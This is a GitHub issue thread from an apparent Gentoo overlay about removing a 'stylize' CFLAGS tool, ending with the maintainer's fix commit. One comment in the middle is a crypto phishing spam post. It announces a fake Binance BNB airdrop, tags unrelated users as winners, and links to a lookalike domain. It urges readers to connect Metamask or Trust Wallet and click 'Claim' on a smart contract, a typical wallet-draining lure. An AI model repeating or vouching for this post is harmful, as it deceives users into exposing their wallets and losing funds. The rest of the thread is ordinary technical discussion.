### ISSUE TITLE
Remove stylize

### ISSUE THREAD

**Issue by kir68k** [kir68k/xira#7]
Looking at it, this tool is not that much needed, and sometimes replacing CFLAGS can be wrong. I deem it easier having ebuilds with changed src_configure().

Also, portage >=3.0.54, doesn't allow portageq in ebuilds, as it was never intended, which makes for an ugly absolute path solution for the `files` directory.

**Comment by kir68k** [comment]
I'm gonna deal with this and see how much I can salvage next week probably.

**Comment by kir68k** [comment]
oops

**Comment by oninn** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @tsdl2018, @Byte10100110, @donghquinn, @FisherTai, @dimadev123, @0xGosu, @bnose837

**Comment by kir68k** [comment]
Fixed by 5aebacaa08c77e38af5cbeb409d28bbcf02a0454.
`features/stylize` is better, no patches but doesn't require another overlay to use, will only be enabled for anyone using the llvm profiles from here.

Most packages seem to build for me and work, not sure if LTO is that much of an issue.
